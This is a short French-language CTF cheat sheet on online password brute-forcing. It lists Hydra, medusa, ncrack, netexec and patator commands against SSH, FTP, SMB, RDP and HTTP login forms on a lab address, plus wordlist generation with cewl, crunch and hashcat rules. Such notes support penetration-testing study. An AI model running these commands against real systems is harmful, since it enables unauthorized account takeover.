Whackermelon
notes / brute-force

Brute force

sommaire

Hydra (brute force en ligne)

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
hydra -L users.txt -P rockyou.txt ftp://10.10.10.10
hydra -L users.txt -P pass.txt 10.10.10.10 smb
hydra -l administrator -P rockyou.txt rdp://10.10.10.10
hydra -l admin -P rockyou.txt 10.10.10.10 -s 8080 http-get /admin

Formulaire HTTP POST (le plus courant en CTF)

hydra -l admin -P rockyou.txt 10.10.10.10 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:F=incorrect"
# F=<texte present en cas d'ECHEC>  (ou S=<texte de succes>)

Autres outils

medusa -h 10.10.10.10 -u admin -P rockyou.txt -M ssh
ncrack -p 3389 --user administrator -P rockyou.txt 10.10.10.10
netexec smb 10.10.10.10 -u users.txt -p pass.txt --continue-on-success
patator ssh_login host=10.10.10.10 user=admin password=FILE0 0=rockyou.txt

Génération de wordlists

cewl -d 2 -m 5 -w wl.txt http://10.10.10.10        # mots du site
crunch 6 8 -o wl.txt                               # combinaisons
username-anarchy -i noms.txt                       # formats de logins
hashcat --stdout -r rules/best64.rule rockyou.txt  # muter une wordlist